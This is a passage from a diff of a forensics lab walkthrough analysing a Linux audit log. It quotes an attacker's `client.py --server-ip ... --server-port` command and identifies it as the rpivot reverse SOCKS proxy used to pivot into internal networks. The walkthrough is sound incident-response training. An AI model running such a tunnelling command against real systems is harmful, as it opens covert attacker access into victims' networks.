ndean06/alpha-linux-audit-log/WALKTHROUGH.md

 ![gedit](screenshots/gedit_all_www_data2.png)
 >❓ *what is this Python Command `python3 client.py --server-ip 20.106.124.93 --server-port 8889` Doing?*

+###🔍 Discovery: Suspicious Python Client Script

+The command `python3 client.py --server-ip 20.106.124.93 --server-port 8889`  indicated a potential outbound connection to a remote host.
+To investigate further, open-source research was conducted.
 ---

+### 🌐 Open Source Intelligence (OSINT)

+A web search for `client.py --server-ip --server-port` led to the finding of a GitHub repository for `rpivot`.

+### 🛠️ Tool Identified: rpivot

+**rpivot** is a reverse SOCKS proxy.

+It is used by attackers to pivot into internal networks by creating a tunnel from the compromised host to a remote attacker's system.

+**Components:**
+- `client.py` — runs on the **victim machine**
+- `server.py` — runs on the **attacker's system**

+### 🔎 Filtering for Attacker Activity as www-data

 ## 🧭 Task 6: Compare with Pre-Intrusion Log